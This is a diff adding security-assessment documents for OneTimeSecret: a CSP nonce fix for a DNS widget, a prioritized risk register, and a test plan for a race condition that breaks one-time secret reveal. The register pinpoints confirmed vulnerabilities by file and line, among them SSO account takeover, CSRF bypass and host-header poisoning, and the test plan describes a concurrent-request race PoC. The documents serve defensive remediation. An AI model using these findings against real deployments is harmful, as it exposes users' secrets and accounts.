+   and is the most durable fix. Verify the vendored file's shape (it currently registers `window.apxDns`)
+   to confirm it can be consumed as a module; it may need a tiny vendored wrapper.
+
+2. **(If injection must stay) Attach the per-response nonce to the created `<script>` (and `<link>`).**
+   This requires exposing the nonce to the SPA, which today is intentionally withheld:
+   - Add a narrowly-scoped accessor for the nonce. Cleanest: read it from the server-rendered DOM at
+     runtime rather than from Pinia — e.g. reuse the nonce already present on a server-emitted script
+     tag (rhales sets `config.nonce_header_name = 'onetime.nonce'` and stamps hydration script tags),
+     or expose it via a dedicated `<meta name="csp-nonce" content="…">` carrying the per-response value.
+     `document.querySelector('script[nonce]')?.nonce` (the IDL `.nonce` reflection, which is readable
+     in-script even though the attribute is hidden from DOM serialization) is a common pattern:
+     ```ts
+     const nonce = document.querySelector<HTMLScriptElement>('script[nonce]')?.nonce;
+     const script = document.createElement('script');
+     script.src = dnsWidgetJs;
+     if (nonce) script.setAttribute('nonce', nonce);
+     // same for the <link rel="stylesheet"> if style-src is tightened later
+     ```
+   - If instead the nonce is exposed through bootstrap, do it as a deliberate, documented change and
+     update `bootstrap-schema-contract.spec.ts:44-45` (which currently asserts the opposite). Note that
+     a nonce read from the *initial* page-load bootstrap is the *page-load* nonce; for an SPA that
+     stays on one document this is fine (the document's nonce does not rotate per client navigation),
+     but document this assumption.
+
+3. **(Lowest preference) Rely on dynamic-insertion being allowed.** If validation (Confirm First #2)
+   shows the injected script loads fine under the enforced CSP, you may leave it — but add a comment at
+   `useDnsWidget.ts:155-163` recording that this depends on the policy **not** using `strict-dynamic`
+   and on dynamic scripts being exempt, so a future CSP tightening re-opens S5.
+
+4. **Reconcile with S1.** S1's checklist already calls out nonce-ing this widget. Whichever path is
+   chosen, include the custom-domain page in S1's Report-Only telemetry review so any `script-src`
+   violation from the widget is caught before CSP is promoted to enforcing.
+
+### Alternatives considered
+
+- **Add `'unsafe-inline'`/widen `script-src` to accommodate the widget:** rejected — it would gut the
+  whole point of S1's nonce-only policy for the entire app to satisfy one admin-only widget.
+- **`strict-dynamic`:** would let a nonce'd loader transitively authorize the widget, but it changes the
+  policy semantics app-wide and still requires the *loader* to carry a nonce; more blast radius than
+  bundling the module.
+- **Do nothing:** acceptable only if validation proves it loads under enforced CSP **and** the team
+  accepts the `strict-dynamic` caveat — but bundling/nonce-ing is cheap insurance.
+
+## Test / verification
+
+- **Runtime (the key check):** with `CSP_ENABLED=true`, open the custom-domain admin page that mounts
+  `DnsWidget.vue`, trigger `initWidget()`, and confirm the widget script and CSS load with **zero** CSP
+  violations in the console. Re-run after the fix to confirm the nonce/bundled path works.
+- **Unit (if nonce path chosen):** mock a nonce source in the DOM and assert
+  `loadAssets()` sets the `nonce` attribute on the created `<script>` (and `<link>`).
+- **Regression:** confirm the widget still initializes and DNS-record verification events
+  (`apx-dnswidget-records-completely-verified`, etc., `useDnsWidget.ts:170-188`) still fire after the
+  change.
+- **Removal path:** if the widget is confirmed retired, grep that nothing else imports
+  `useDnsWidget`/`dnswidget.v1.js` before deleting, and confirm the custom-domain UI no longer
+  references `#apxdnswidget` (`DnsWidget.vue:164`).
+
+## Effort & risk
+
+- **Effort:** Small-to-Medium. Nonce-attach is small but needs a sanctioned nonce-exposure decision
+  (touches the bootstrap contract test). Converting to a bundled module is Medium (depends on the
+  vendored file's module shape). Removal (if retired) is small.
+- **Risk:** Low. Pure additive hardening gated behind runtime validation; no behavior change unless CSP
+  is enforced. Main hazard is exposing the nonce more broadly than intended — mitigate by reading it
+  from the existing server-rendered DOM rather than threading it through app state, and by keeping the
+  accessor narrow and documented.

--- a/docs/security/assessment-2026-06-22/risk-register.md
+++ b/docs/security/assessment-2026-06-22/risk-register.md
@@ -1,0 +1,62 @@
+# OneTimeSecret — Risk Register (Prioritized)
+
+Ratings: **Severity** = overall risk when the feature is enabled. **Exploitability** (Easy/Moderate/Hard)
+= attacker effort/preconditions. **Business impact** (High/Med/Low) = consequence to the product's promise.
+**Default?** = affects the out-of-the-box config (auth & SSO are OFF by default).
+Status: ✅ confirmed (source) · 🧪 runtime-PoC · 🔎 needs-validation.
+
+| ID | Finding | Sev | Exploit | Bus. impact | Default? | Status | Evidence |
+|----|---------|-----|---------|-------------|----------|--------|----------|
+| A1 | SSO email-match account takeover (no `email_verified`) | **Critical** | Moderate | High | No (SSO) | ✅ | 01; `config/hooks/omniauth.rb:27-30` |
+| C1 | TOCTOU race — one-time guarantee broken | **High** | Moderate¹ | High | **Yes** | 🧪 | 03 F1; `secret_state_management.rb:60`; PoC `poc/`, `evidence/race_poc_output.txt` |
+| A2 | SSO bypasses MFA unconditionally | **High** | Easy² | High | No (SSO+MFA) | ✅ | 01; `hooks/login.rb:128-133` |
+| A3 | Host-header poisoning of reset/magic/verify links | **High** | Moderate | High | No (auth) | ✅ | 01/04; `detect_host.rb:156-194` |
+| A4 | SSO domain allowlist not enforced on linking path | **High** | Moderate | High | No (SSO) | ✅ | 01; `hooks/omniauth.rb:133-180` |
+| P1 | CSRF bypass for cookie-auth `/api/*` mutations | **High** | Moderate | High | No (login) | ✅ | 04; `security.rb:142` |
+| S1 | CSP disabled by default | **High** | Moderate | Med | **Yes** | 🧪 | 05; `config.defaults.yaml:351`; `evidence/headers_output.txt` |
+| S2 | Clickjacking/HSTS/headers off by default | **High** | Moderate | Med | **Yes** | 🧪 | 05/04; `config.defaults.yaml:314-338`; `evidence/headers_output.txt` |
+| D1 | `oauth2` 2.0.18 bearer-token leak CVE | **High** | Moderate | High | No (SSO) | ✅ | 06; `Gemfile.lock:265` |
+| C2 | Encryption HKDF salt = shared lib default | Medium | Hard | Med | Yes | ✅ | 03 F2; `configure_familia.rb:57-72` |
+| C3 | V1 reveal: no passphrase rate limiting | Medium | Moderate | Med | Yes³ | ✅ | 03 F3; `v1/.../show_secret.rb:26-31` |
+| P2 | `DetectHost` un-harmonized host trust | Medium | Hard | Med | Yes | ✅ | 04; `detect_host.rb:156-165` |
+| P3 | Rate-limit gaps (login, secret create) | Medium | Easy | Med | Yes | ✅ | 04; `v1/controllers/base.rb:145-171` |
+| AZ1 | RemoveMember authz inconsistency | Medium | Hard | Med | No (orgs) | ✅ | 02 F1 |
+| AZ2 | Org safe_dump leaks internal/cross-tenant data | Medium | Easy⁴ | Med | No (orgs) | ✅ | 02 F2; `organization/.../safe_dump_fields.rb:17-29` |
+| AZ3 | `Organization.create!` open splat (mass-assign) | Medium | Hard | Med | No (orgs) | 🔎 | 02 F3; `organization.rb:431-437` |
+| AZ4 | `change_role!` accepts `owner` | Medium | Hard | Med | No (orgs) | 🔎 | 02 F4; `organization_membership.rb:258-274` |
+| AZ5 | Org extid plain SHA-256 (no HMAC) | Medium | Hard | Low | No (orgs) | 🔎 | 02 F5; `organization.rb:46` |
+| A5 | Recovery codes stored plaintext | Medium | Hard⁵ | High | No (auth) | ✅ | 01; `rodauth/.../recovery_codes.rb` |
+| A6 | WebAuthn RP-ID/origin from `request.host` | Medium | Hard | Med | No (auth) | ✅ | 01; `features/webauthn.rb:14-22` |
+| A7 | Reset enumeration + no max password length (Argon2 DoS) | Medium | Easy | Med | No (auth) | ✅ | 01; `features/account_management.rb:104` |
+| A8 | 1-day per-account lockout (targeted DoS) | Medium | Easy | Med | No (auth) | ✅ | 01; `features/lockout.rb:15` |
+| D2 | `form-data` 4.0.5 via axios (browser, mitigated) | Medium | Hard | Low | Yes | ✅ | 06; `pnpm-lock.yaml:3129` |
+| D3 | Production source maps shipped/served | Medium | Easy | Low | Yes | ✅ | 06/05; `vite.config.ts:283` |
+| D4 | Caddy proxy runs as root, unpinned base | Medium | Hard | Med | (Caddy variant) | ✅ | 06; `docker/variants/caddy.dockerfile:85` |
+| D5 | Unauth Redis + host-exposed; RabbitMQ guest:guest | Medium | Moderate⁶ | High | (compose) | ✅ | 06; `docker-compose.simple.yml:57-69` |
+| S3 | Revealed secret not cleared from SPA memory | Medium | Hard | Med | Yes | ✅ | 05; `secretStore.ts:203-216` |
+| C4 | Passphrase rate-limit check/record non-atomic | Medium | Moderate | Med | Yes | ✅ | 03 F4 |
+| C5 | No secret payload size cap (Redis DoS) | Low | Easy | Low | Yes | ✅ | 03 F5; `conceal_secret.rb` |
+| C6 | Legacy v1 unsalted SHA-256 enc key (read-compat) | Low | Hard | Low | Yes | ✅ | 03 F6; `configure_familia.rb:65` |
+| AZ6 | Receipt safe_dump exposes creator owner_id | Low | Easy | Low | Yes | ✅ | 02 F6 |
+| AZ7 | show_invite discloses inviter email + account oracle | Low | Easy | Low | No (invites) | ✅ | 02 F7; `invite/logic/base.rb:51-64` |
+| AZ8 | Customer.create! no allowlist (safe today) | Low | Hard | Med | Yes | 🔎 | 02 F8; `customer.rb:271-313` |
+| AZ9 | No rate limit on anonymous incoming `/secret` (emails) | Low | Easy | Low | No (incoming) | 🔎 | 02 F9 |
+| P4 | V1 Basic-Auth username enumeration via timing | Low | Hard | Low | No (auth) | ✅ | 04; `v1/controllers/base.rb:68-71` |
+| P5 | Log injection of Basic-Auth username | Low | Easy | Low | No (auth) | ✅ | 04; `v1/controllers/base.rb:67` |
+| S4 | `v-html` in GlobalBroadcast (sanitized) | Low | Hard | Low | Yes | ✅ | 05; `GlobalBroadcast.vue:139` |
+| S5 | DNS widget script injected without nonce | Low | Hard | Low | No (domains) | 🔎 | 05; `useDnsWidget.ts:155-163` |
+| OBS1 | SessionDebugger dumps Set-Cookie when enabled | Info | Hard | Low | No | ✅ | 06; `session_debugger.rb:102` |
+
+**Footnotes**
+1. C1 is Easy under production multi-worker Puma (PoC: 12/12 processes); Hard within a single GIL-bound process.
+2. A2 requires SSO and MFA both enabled and the victim to log in via SSO.
+3. C3 default-applicable only if the V1 API remains routable.
+4. AZ2 requires being any active member of the target org.
+5. A5 requires DB read access; impact is high because codes are the MFA fallback.
+6. D5 Moderate if the compose network/host is reachable; the simple compose publishes 6379 to the host.
+
+## Suggested sprint ordering
+1. **Now:** C1 (atomic consume), S1/S2 (secure headers default-on), D1 (oauth2 bump).
+2. **Next (if accounts/SSO offered):** A1, A2, A4, A3/P2, P1.
+3. **Hardening:** C2, C3, P3, AZ1/AZ2, A5/A6/A7/A8, D3/D4/D5.
+4. **Cleanup / pre-emptive:** C4/C5/C6, AZ3/AZ4/AZ5/AZ8, P4/P5, S3/S4/S5.

--- a/docs/security/assessment-2026-06-22/risk-register.md
+++ b/docs/security/assessment-2026-06-22/risk-register.md
@@ -9,7 +9,7 @@ Status: ✅ confirmed (source) · 🧪 runtime-PoC · 🔎 needs-validation.
 |----|---------|-----|---------|-------------|----------|--------|----------|
 | A1 | SSO email-match account takeover (no `email_verified`) | **Critical** | Moderate | High | No (SSO) | ✅ | 01; `config/hooks/omniauth.rb:27-30` |
 | C1 | TOCTOU race — one-time guarantee broken | **High** | Moderate¹ | High | **Yes** | 🧪 | 03 F1; `secret_state_management.rb:60`; PoC `poc/`, `evidence/race_poc_output.txt` |
-| A2 | SSO bypasses MFA unconditionally | **High** | Easy² | High | No (SSO+MFA) | ✅ | 01; `hooks/login.rb:128-133` |
+| A2 | SSO + local MFA — add opt-in 2nd factor after SSO (default unchanged, reclassified after industry research: SSO-as-authenticated is the norm) | Low–Med | n/a² | Med | No (SSO+MFA) | ✅ | 01; `hooks/login.rb:128-133` |
 | A3 | Host-header poisoning of reset/magic/verify links | **High** | Moderate | High | No (auth) | ✅ | 01/04; `detect_host.rb:156-194` |
 | A4 | SSO domain allowlist not enforced on linking path | **High** | Moderate | High | No (SSO) | ✅ | 01; `hooks/omniauth.rb:133-180` |
 | P1 | CSRF bypass for cookie-auth `/api/*` mutations | **High** | Moderate | High | No (login) | ✅ | 04; `security.rb:142` |
@@ -49,7 +49,7 @@ Status: ✅ confirmed (source) · 🧪 runtime-PoC · 🔎 needs-validation.
 
 **Footnotes**
 1. C1 is Easy under production multi-worker Puma (PoC: 12/12 processes); Hard within a single GIL-bound process.
-2. A2 requires SSO and MFA both enabled and the victim to log in via SSO.
+2. A2 reclassified Low–Med: treating SSO as fully authenticated (no local 2nd factor) is the industry default (WorkOS exempts SSO from MFA; Clerk/others defer to IdP MFA) and was an intentional choice (#3114). The fix is an *opt-in* "require local MFA after SSO" toggle (default off) for high-assurance operators — not a default change.
 3. C3 default-applicable only if the V1 API remains routable.
 4. AZ2 requires being any active member of the target org.
 5. A5 requires DB read access; impact is high because codes are the MFA fallback.

--- a/docs/security/assessment-2026-06-22/risk-register.md
+++ b/docs/security/assessment-2026-06-22/risk-register.md
@@ -8,13 +8,13 @@ Status: ✅ confirmed (source) · 🧪 runtime-PoC · 🔎 needs-validation.
 | ID | Finding | Sev | Exploit | Bus. impact | Default? | Status | Evidence |
 |----|---------|-----|---------|-------------|----------|--------|----------|
 | A1 | SSO email-match account takeover (no `email_verified`) | **Critical** | Moderate | High | No (SSO) | ✅ | 01; `config/hooks/omniauth.rb:27-30` |
-| C1 | TOCTOU race — one-time guarantee broken | **High** | Moderate¹ | High | **Yes** | 🧪 | 03 F1; `secret_state_management.rb:60`; PoC `poc/`, `evidence/race_poc_output.txt` |
+| C1 | TOCTOU race — one-time guarantee broken | **High** | Moderate¹ | High | **Yes** | 🧪 | 03 F1; `secret_state_management.rb:60`; PoC `poc/`, `evidence/race_poc_output.md` |
 | A2 | SSO + local MFA — add opt-in 2nd factor after SSO (default unchanged, reclassified after industry research: SSO-as-authenticated is the norm) | Low–Med | n/a² | Med | No (SSO+MFA) | ✅ | 01; `hooks/login.rb:128-133` |
 | A3 | Host-header poisoning of reset/magic/verify links | **High** | Moderate | High | No (auth) | ✅ | 01/04; `detect_host.rb:156-194` |
 | A4 | SSO domain allowlist not enforced on linking path | **High** | Moderate | High | No (SSO) | ✅ | 01; `hooks/omniauth.rb:133-180` |
 | P1 | CSRF bypass for cookie-auth `/api/*` mutations | **High** | Moderate | High | No (login) | ✅ | 04; `security.rb:142` |
-| S1 | CSP disabled by default | **High** | Moderate | Med | **Yes** | 🧪 | 05; `config.defaults.yaml:351`; `evidence/headers_output.txt` |
-| S2 | Clickjacking/HSTS/headers off by default | **High** | Moderate | Med | **Yes** | 🧪 | 05/04; `config.defaults.yaml:314-338`; `evidence/headers_output.txt` |
+| S1 | CSP disabled by default | **High** | Moderate | Med | **Yes** | 🧪 | 05; `config.defaults.yaml:351`; `evidence/headers_output.md` |
+| S2 | Clickjacking/HSTS/headers off by default | **High** | Moderate | Med | **Yes** | 🧪 | 05/04; `config.defaults.yaml:314-338`; `evidence/headers_output.md` |
 | D1 | `oauth2` 2.0.18 bearer-token leak CVE | **High** | Moderate | High | No (SSO) | ✅ | 06; `Gemfile.lock:265` |
 | C2 | Encryption HKDF salt = shared lib default | Medium | Hard | Med | Yes | ✅ | 03 F2; `configure_familia.rb:57-72` |
 | C3 | V1 reveal: no passphrase rate limiting | Medium | Moderate | Med | Yes³ | ✅ | 03 F3; `v1/.../show_secret.rb:26-31` |

--- a/docs/security/assessment-2026-06-22/test-plans/C1.md
+++ b/docs/security/assessment-2026-06-22/test-plans/C1.md
@@ -1,0 +1,317 @@
+# C1 — Atomic one-time consume (reveal / burn) — TEST PRESCRIPTION
+
+- **Resolution under test:** `../resolutions/C1-one-time-reveal-atomicity.md`
+- **Status:** Prescribed *before* implementation. Tests are written against the prescribed
+  `Onetime::Secret#consume!` primitive and the claim-then-decrypt refactor of `reveal_secret.rb`,
+  `show_secret.rb` (v1/v2) and `burn_secret.rb` (v1/v2). Do **not** wait for code — land these specs
+  so coverage is guaranteed when the fix merges.
+- **Primary source touched by the fix:**
+  - `lib/onetime/models/secret/features/secret_state_management.rb` (`revealed!`, `burned!`, new `consume!`)
+  - `apps/api/v2/logic/secrets/reveal_secret.rb`, `apps/api/v2/logic/secrets/burn_secret.rb`
+  - `apps/api/v1/logic/secrets/show_secret.rb`, `apps/api/v1/logic/secrets/burn_secret.rb`
+  - `familia/lib/familia/horreum/{persistence,database_commands}.rb` (atomic delete primitives)
+- **PoC harness to reuse:** `../poc/_setup_secret.rb`, `../poc/_reveal_worker.rb`, `../poc/race_reveal.sh`,
+  `../poc/race_reveal_model.rb`, `../poc/race_reveal_inproc.rb`.
+- **Style mirrored from:** `apps/api/v2/spec/logic/secrets/burn_secret_spec.rb` (real
+  `Receipt.spawn_pair` fixtures, `Onetime.boot! :test`, direct `process_params`/`process`),
+  `try/unit/models/v2/secret_try.rb` (model-level tryout assertions),
+  `try/unit/logic/secrets/show_secret_try.rb`.
+
+## Conventions used below
+
+- **Layer = `unit`** → a tryout under `try/unit/...` (the project's `#=> expected` doctest format) or an
+  RSpec model unit spec, no HTTP.
+- **Layer = `integration`** → RSpec under `apps/api/v{1,2}/spec/logic/secrets/` exercising the logic class
+  end to end against real Redis/Valkey (like `burn_secret_spec.rb`).
+- **Layer = `tryout`** → existing `try/security/*_try.rb` style (single process, deterministic).
+- **Layer = `concurrency`** → multi-PROCESS harness driven from a shell/RSpec wrapper that shells out to
+  `../poc/_reveal_worker.rb`. A single MRI process **cannot** reproduce the race (GIL serialises the
+  decrypt), so true concurrency coverage MUST fork OS processes — an in-process thread test is a
+  *weaker* secondary check only.
+
+> CRITICAL FIXTURE NOTE: `Secret#objid` must be called before assigning `ciphertext` (the encrypted-field
+> setter binds to the record's identifier/context). Mirror `_setup_secret.rb` / `race_reveal_model.rb`:
+> `s = Secret.new; s.objid; s.state='new'; s.owner_id=...; s.ciphertext=plaintext; s.save`.
+
+---
+
+## 1. `consume!` primitive — unit
+
+### C1-U-01 — `consume!` returns the field hash exactly once across two threads
+- **Layer:** unit (RSpec model spec)
+- **Target file:** `spec/models/secret/consume_spec.rb` (new) — or
+  `apps/api/v2/spec/logic/secrets/consume_primitive_spec.rb`
+- **Preconditions/fixtures:** real Valkey; one saved `Secret` in `state=new` with a canary ciphertext.
+- **Action:** start two threads that both call `secret_a.consume!` / `secret_b.consume!` on two freshly
+  `load`ed instances of the same id, released from a barrier (`Queue`/`CountDownLatch`).
+- **Expected:** exactly one call returns a non-empty `Hash` of fields; the other returns `nil`. Key is
+  deleted afterwards (`Secret.load(id)` is nil).
+- **Type:** concurrency + primitive happy-path.
+
+### C1-U-02 — `consume!` on an already-consumed / missing key returns nil
+- **Layer:** unit
+- **Target:** same spec file.
+- **Preconditions:** secret saved then `consume!`d once (or never created).
+- **Action:** call `consume!` again.
+- **Expected:** returns `nil`; no exception; no resurrection of the key.
+- **Type:** negative / regression.
+
+### C1-U-03 — `consume!` only fires on `new`/`previewed`; refuses `revealed`/`burned`
+- **Layer:** unit
+- **Target:** same spec file.
+- **Preconditions:** secret forced to `state=revealed` (and a second to `state=burned`) without delete.
+- **Action:** call `consume!`.
+- **Expected:** returns `nil`, key untouched (state precondition is enforced **server-side** in the Lua /
+  WATCH path, not just by in-memory `@state`).
+- **Type:** edge / state-machine guard.
+
+### C1-U-04 — `consume!` is single-round-trip and decrypt is NOT performed inside it
+- **Layer:** unit
+- **Target:** same spec file.
+- **Preconditions:** secret with passphrase-protected ciphertext.
+- **Action:** call `consume!`; inspect returned hash.
+- **Expected:** returns raw encrypted fields only (ciphertext still encrypted); decryption happens in the
+  caller *after* the claim. Guards "never decrypt-then-claim".
+- **Type:** edge / ordering invariant.
+
+### C1-U-05 (tryout mirror) — state terminology + consume in tryout form
+- **Layer:** tryout
+- **Target:** `try/unit/models/secret_consume_try.rb` (new), beside
+  `try/unit/models/secret_state_terminology_try.rb`.
+- **Action:** create secret, `consume!`, assert returned hash shape and that a second `consume!` is nil.
+- **Expected:** `#=>` doctest assertions pass.
+- **Type:** happy-path doc-coverage (keeps tryout suite green; the project keeps a model tryout per area).
+
+---
+
+## 2. True multi-process concurrency — the headline guarantee
+
+### C1-C-01 — N processes reveal the same id → exactly ONE plaintext, rest MissingSecret
+- **Layer:** concurrency (multi-process)
+- **Target file:** `spec/security/reveal_atomicity_race_spec.rb` (new) that shells out to the PoC, OR keep
+  it as a CI-runnable script `try/security/reveal_race_consume_try.rb` invoking `../poc/_reveal_worker.rb`.
+- **Preconditions/fixtures:** Valkey running; run `../poc/_setup_secret.rb` to create one secret and write
+  `secret_id.txt`; write a shared wall-clock `deadline.txt` ~250 ms out so all workers hit the consume in
+  the same millisecond. N = 12 (the count that reproduced 12/12 in the assessment), ideally also N=30.
+- **Action:** fork N copies of `_reveal_worker.rb` (each its own OS process → no shared GIL), join all,
+  collect `got=true/false` lines.
+- **Expected:** `count(got=true) == 1`; the remaining `N-1` workers report `got=false` (lost the race →
+  `consume!` returned nil → `OT::MissingSecret`). Secret key absent afterwards.
+- **Type:** concurrency / PRIMARY regression. This is the test that fails today (12/12) and must pass after
+  the fix. Mark it the gating acceptance test.
+
+> NOTE: `_reveal_worker.rb` currently calls the *old* `s.decrypted_secret_value` then `s.revealed!`
+> sequence. The prescription is to update the worker (or add `_reveal_worker_consume.rb`) to the
+> claim-then-decrypt flow (`fields = s.consume!; got = !fields.nil? && decrypt(fields) present`). The
+> assertion (exactly one `got`) is unchanged.
+
+### C1-C-02 — HTTP-level race via `race_reveal.sh` against a clustered Puma boot
+- **Layer:** concurrency (e2e/HTTP, multi-process)
+- **Target:** `e2e`-adjacent script wrapper or `spec/security/reveal_atomicity_http_race_spec.rb` invoking
+  `../poc/race_reveal.sh $BASE 30`. MUST run against **clustered Puma (`WEB_CONCURRENCY>=2`)**, not a
+  single-process test server, or it cannot reproduce.
+- **Preconditions:** app booted with multiple workers; anonymous conceal allowed.
+- **Action:** conceal a canary, fire 30 concurrent `POST /api/v2/secret/:id/reveal?continue=true`.
+- **Expected:** exactly 1 response body contains the canary plaintext; the other 29 are `MissingSecret`
+  (404/`secret not found`)-shaped, none contain the canary.
+- **Type:** concurrency / end-to-end regression. Flag: needs the multi-worker boot in CI (see Risks).
+
+### C1-C-03 — In-process thread race (secondary, weaker) still single-winner
+- **Layer:** concurrency (in-process, via `../poc/race_reveal_model.rb` semantics)
+- **Target:** `spec/security/reveal_atomicity_inproc_spec.rb`.
+- **Preconditions:** single process; threads load+check then barrier before consume (the
+  `race_reveal_model.rb` barrier reproduces the reachable interleave).
+- **Action:** CONC threads each do `load → viewable? → <barrier> → consume!/decrypt`.
+- **Expected:** `passed_viewable_gate+revealed_plaintext == 1`. Documented as a weaker check — passing here
+  is necessary but NOT sufficient; C1-C-01 is authoritative.
+- **Type:** concurrency / supplementary.
+
+### C1-C-04 — burn-vs-burn double-burn race → only one burn succeeds
+- **Layer:** concurrency (multi-process)
+- **Target:** `spec/security/burn_atomicity_race_spec.rb` (new); adapt `_reveal_worker.rb` to call the burn
+  path (`burned!`/`consume!`).
+- **Preconditions:** one saved secret + receipt.
+- **Action:** N processes burn the same receipt id simultaneously.
+- **Expected:** exactly one process observes a successful burn (greenlighted + key deleted once); the rest
+  see already-consumed. `secrets_burned` incremented exactly once (see C1-I-08).
+- **Type:** concurrency / negative (no double-burn).
+
+### C1-C-05 — reveal-vs-burn race → not BOTH succeed on the same secret
+- **Layer:** concurrency (multi-process)
+- **Target:** `spec/security/reveal_vs_burn_race_spec.rb` (new).
+- **Preconditions:** one saved secret + receipt; mixed worker pool: half reveal, half burn, same id.
+- **Action:** release all simultaneously against the shared deadline.
+- **Expected:** at most ONE consumer wins overall — either exactly one reveal returns plaintext OR exactly
+  one burn succeeds, never both; the key is consumed exactly once; total "winners" across both actions
+  == 1.
+- **Type:** concurrency / cross-action negative (the subtle race the resolution calls out).
+
+---
+
+## 3. Passphrase semantics (consume must not fire on wrong passphrase)
+
+### C1-I-01 — wrong passphrase does NOT consume the secret
+- **Layer:** integration (v2 RevealSecret)
+- **Target file:** `apps/api/v2/spec/logic/secrets/reveal_secret_spec.rb` (new; mirror
+  `burn_secret_spec.rb` structure — `Receipt.spawn_pair`, `build_logic`, direct `process`).
+- **Preconditions:** secret created WITH a passphrase; `continue=true`.
+- **Action:** `process` with an INCORRECT passphrase.
+- **Expected:** raises the incorrect-passphrase form error; `Secret.load(id)` still present & `viewable?`
+  (NOT consumed); `consume!` never called; failed-attempt counter recorded
+  (`PassphraseRateLimiter`).
+- **Type:** negative / regression (this is the property the resolution most wants preserved).
+
+### C1-I-02 — correct passphrase + `continue=true` consumes exactly once
+- **Layer:** integration (v2 RevealSecret)
+- **Target:** same spec file.
+- **Preconditions:** passphrase secret.
+- **Action:** `process` with the correct passphrase and `continue=true`.
+- **Expected:** `show_secret` true; `secret_value` == plaintext; secret deleted afterwards; a *second*
+  reveal of the same id raises `OT::MissingSecret`.
+- **Type:** happy-path / regression.
+
+### C1-I-03 — correct passphrase but `continue` false/absent does NOT consume
+- **Layer:** integration (v2 RevealSecret)
+- **Target:** same spec file.
+- **Preconditions:** passphrase secret.
+- **Action:** `process` with correct passphrase and `continue` = `'false'` (and a variant with `continue`
+  absent).
+- **Expected:** `show_secret` false; no plaintext returned; secret still present & viewable; `consume!`
+  not called. (Parallels `burn_secret_spec.rb`'s "string false" guard.)
+- **Type:** edge / regression.
+
+### C1-I-04 — passphrase verified via READ-ONLY load before claim
+- **Layer:** integration / unit
+- **Target:** same spec file.
+- **Preconditions:** passphrase secret; spy/expectation on `consume!`.
+- **Action:** wrong passphrase then correct passphrase in separate requests.
+- **Expected:** `consume!` is invoked only on the correct-passphrase+continue request; the wrong-passphrase
+  request performs only a read (no delete, no state mutation).
+- **Type:** ordering invariant / negative.
+
+---
+
+## 4. Normal single-reveal happy path & API parity
+
+### C1-I-05 — normal single reveal returns value AND destroys (no passphrase)
+- **Layer:** integration (v2 RevealSecret)
+- **Target:** `apps/api/v2/spec/logic/secrets/reveal_secret_spec.rb`.
+- **Preconditions:** plain secret, `continue=true`.
+- **Action:** `process`.
+- **Expected:** `success_data[:record][:secret_value]` == plaintext; secret destroyed; re-reveal →
+  `MissingSecret`. Single-request behaviour unchanged vs. pre-fix.
+- **Type:** happy-path / regression (the resolution promises identical single-request behaviour).
+
+### C1-I-06 — v1 `ShowSecret` reveal parity (reveal + destroy via shared primitive)
+- **Layer:** integration (v1)
+- **Target file:** `apps/api/v1/spec/logic/secrets/show_secret_spec.rb` (new) and/or extend
+  `try/unit/logic/secrets/show_secret_try.rb`.
+- **Preconditions:** secret created; v1 params use `key`/`continue` (not `identifier`).
+- **Action:** `process` with `continue=true`.
+- **Expected:** plaintext returned once, secret destroyed, re-reveal `MissingSecret`; passphrase rules
+  identical to v2.
+- **Type:** parity / regression.
+
+### C1-I-07 — v1/v2 burn parity through the shared primitive
+- **Layer:** integration
+- **Target:** extend `apps/api/v2/spec/logic/secrets/burn_secret_spec.rb` + new
+  `apps/api/v1/spec/logic/secrets/burn_secret_spec.rb`.
+- **Action:** burn with `continue=true` (and the existing string-`false` guard case).
+- **Expected:** burn succeeds once; secret gone; the existing `continue='false'` test still passes
+  (no regression to that fix).
+- **Type:** parity / regression.
+
+> v3 NOTE: there is currently NO `apps/api/v3/logic/secrets/*` reveal/show/burn (verified — none found).
+> "v1/v2/v3 parity" therefore reduces to v1+v2 funnelling through the same model primitive. Add a
+> placeholder gap row (see matrix) so if v3 logic lands later it inherits the same `consume!` coverage.
+
+---
+
+## 5. Receipt state + counters update exactly once
+
+### C1-I-08 — `secrets_shared` counter & receipt state increment exactly once (not N times)
+- **Layer:** integration + concurrency
+- **Target:** `spec/security/reveal_atomicity_race_spec.rb` (assert side-effects after C1-C-01) plus a
+  single-process unit in `reveal_secret_spec.rb`.
+- **Preconditions:** OWNER (non-anonymous) secret so `owner.increment_field :secrets_shared` fires;
+  capture `Onetime::Customer.secrets_shared` global counter and the receipt's revealed state before/after.
+- **Action:** run the N-process reveal race (C1-C-01) against an owned secret.
+- **Expected:** owner `secrets_shared` delta == 1; global `Customer.secrets_shared` delta == 1; receipt
+  transitions to `revealed` exactly once. NOT incremented N times (the winner-only counter move is part
+  of the fix).
+- **Type:** concurrency / regression (data-integrity).
+
+### C1-I-09 — receipt `revealed!`/`burned!` is idempotent under loss-of-race
+- **Layer:** integration
+- **Target:** `reveal_secret_spec.rb` / `burn_secret_spec.rb`.
+- **Preconditions:** secret already consumed; a losing caller still holds a stale in-memory instance.
+- **Action:** losing caller attempts counter/receipt update.
+- **Expected:** no receipt double-update; counters unchanged for the loser.
+- **Type:** negative / idempotency.
+
+---
+
+## 6. Verification-secret flow (must still work after refactor)
+
+### C1-I-10 — verification secret: anonymous/owner-unverified reveal verifies owner + consumes once
+- **Layer:** integration (v2 RevealSecret, `verification=true` branch)
+- **Target:** `apps/api/v2/spec/logic/secrets/reveal_secret_spec.rb` (verification context).
+- **Preconditions:** owner account created (unverified); a verification secret whose `verification` field
+  == `'true'`; reveal as anonymous/owner per the branch in `reveal_secret.rb:97-164`.
+- **Action:** `process` with `continue=true`.
+- **Expected:** `owner.verified` set true, `verified_by='email'`, `reset_secret` deleted, session cleared
+  (unless empty), and `secret.revealed!`/`consume!` fires exactly once. The claim-then-decrypt refactor
+  must NOT break the verification side-effects.
+- **Type:** regression / integration (highest-risk side-effect path).
+
+### C1-I-11 — verification edge cases preserved (owner nil / already-verified / logged-in)
+- **Layer:** integration
+- **Target:** same verification context.
+- **Action:** drive the three error branches: owner nil → `verification_not_valid`; owner anonymous →
+  `verification_not_valid`; owner already verified → logs error BUT still `revealed!` (consumes) and lets
+  user carry on; logged-in mismatch → `verification_already_logged_in`.
+- **Expected:** each branch matches current behaviour; the "already verified ⇒ still consume" subtlety is
+  preserved (it calls `secret.revealed!`).
+- **Type:** edge / regression.
+
+---
+
+## Coverage matrix — C1 acceptance criteria → test IDs
+
+| # | Acceptance criterion (from C1 resolution) | Test IDs |
+|---|---|---|
+| AC1 | N concurrent processes → exactly one plaintext, rest `MissingSecret` | C1-C-01, C1-C-02 |
+| AC2 | `consume!` primitive: two threads → one hash, one nil | C1-U-01, C1-U-02, C1-C-03 |
